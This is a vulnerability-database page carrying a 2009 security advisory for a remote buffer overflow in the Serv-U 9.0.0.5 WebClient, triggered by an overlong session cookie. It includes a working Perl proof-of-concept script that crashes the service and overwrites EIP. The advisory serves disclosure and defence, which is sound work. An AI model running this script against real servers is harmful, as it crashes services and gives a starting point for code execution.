Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Serv-U 9.0.0.5 WebClient Buffer Overflow

🗓️ 03 Nov 2009 00:00:00Reported by Nikolaos RangosType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 26 Views

Remote Buffer Overflow in Serv-U 9.0.0.5 WebClien

Code
`-- KC Security PUBLIC ADVISORY -- http://www.rangos.de --   
11-01-2009  
  
  
RhinoSoft.com Serv-U 9.0.0.5 WebClient Remote Buffer Overflow  
  
  
Background  
------------  
  
Serv-U includes a simple, browser-based transfer client perfect  
for every business environment. The Web Client is accessed through  
a standard web browser and features an unintimidating, familiar interface.  
It is a great way for sharing photos and image files with clients and  
co-workers due to its configurable thumbnail view that allows remote  
images to be quickly viewed without downloading the entire file.  
An additional slideshow view offers a fast way to share a collection   
of photos from your latest projects. When using Serv-U, photo sharing   
sites and large email attachments are a thing of the past!  
  
  
Description  
------------  
  
Remote exploitation of a buffer overflow in the Serv-U WebClient  
may allow attackers to execute arbitrary code.  
  
The problem lies in the handling of overly long Session Cookies.  
When a very long session cookie is sent to the Serv-U WebClient  
HTTP Service an overrun occurs and EIP becomes "overwritten".  
  
  
Detection  
------------  
KC Security confirmed the vulnerability in the latest version of Serv-U  
WebClient which is 9.0.0.5.  
  
  
Workaround  
------------  
Disable the WebClient Service and use the Serv-U FTP/SFTP components only.  
  
  
Proof of concept  
------------  
The following PERL script will crash the Serv-U.exe service and overwrite  
EIP with 0xAAAAAAAA.  
  
---snip---  
use IO::Socket;  
  
$|=1;  
$a = "A" x 100000;  
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],  
PeerPort => '80',  
Proto => 'tcp');   
  
print $sock "POST / HTTP/1.1\r\n"  
."Host: $ARGV[0]\r\n"  
."Cookie: killmenothing; SULang=de%2CDE; themename=vista; Session=_d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb950754581406246bf8$a\r\n"  
."Content-Type: multipart/form-data; boundary=---------------------------25249352331758\r\n"  
."Content-Length: 0\r\n\r\n";  
  
while (<$sock>) {  
print;  
}  
---snip---  
  
  
Credit  
------------  
This vulnerability was discovered by Nikolaos Rangos of KC Security.  
Visit us at http://www.rangos.de  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Nov 2009 00:00Current
0.3Low risk
Vulners AI Score0.3
serv-ubuffer overflowremote exploitationvulnerabilitywebclient servicesecurity advisorynikolaos rangoskc securityrhinosoft.com
26